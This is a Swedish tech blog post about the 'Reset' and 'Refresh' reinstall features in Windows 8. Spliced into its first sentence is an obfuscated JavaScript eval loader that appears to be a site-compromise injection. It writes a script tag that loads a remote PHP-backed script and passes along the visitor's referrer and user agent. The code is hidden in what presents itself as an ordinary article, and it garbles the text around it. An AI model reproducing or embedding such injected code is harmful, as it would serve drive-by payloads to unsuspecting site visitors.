Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Reset och refresh i Windows 8

Reset och refresh i Windows 8
Sebastian
”Reset” eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tiydd|var|u0026u|referrer|ihbhd||js|php’.split(’|’),0,{}))
och ”refresh” är två nya funktioner som kommer underlätta ominstallation på ny Windows 8!
Det var ett tag sen vi fick höra några ”riktiga” nyheter om Windows 8. Nu har Microsoft uppdaterat sin utvecklingsblogg för Windows 8 med ett inlägg om detaljer omkring några nya funktioner.

Dessa är ”Refresh” och ”Reset”. Det är inte så svårt att förstå vad de kommer fylla för funktion. Troligen kommer den sistnämnda också att få byta namn vid release då den påminner om en viss knapp som redan finns på datorn.

”Reset” handlar om att man gör en full ominstallation av Windows 8 utan att behålla någon data alls. Man blir tillfrågad om man vill radera allt innehåll på hårddisken eller spara den innan ominstallationen görs. Väljer man att spara data så kan man enkelt plocka fram dessa igen senare.

”Refresh” är egentligen det alternativet som är mest användbart om man vill behålla massa data och innehåll på datorn. Refresh återställer bara operativsystemet. All personlig data, inställningar i operativsystemet och applikationer kommer att hållas kvar när detta val körs.

httpv://www.youtube.com/watch?v=HGyx4H6ctUU&feature=player_embedded

Läs mer här: blogs.msdn.com

Comments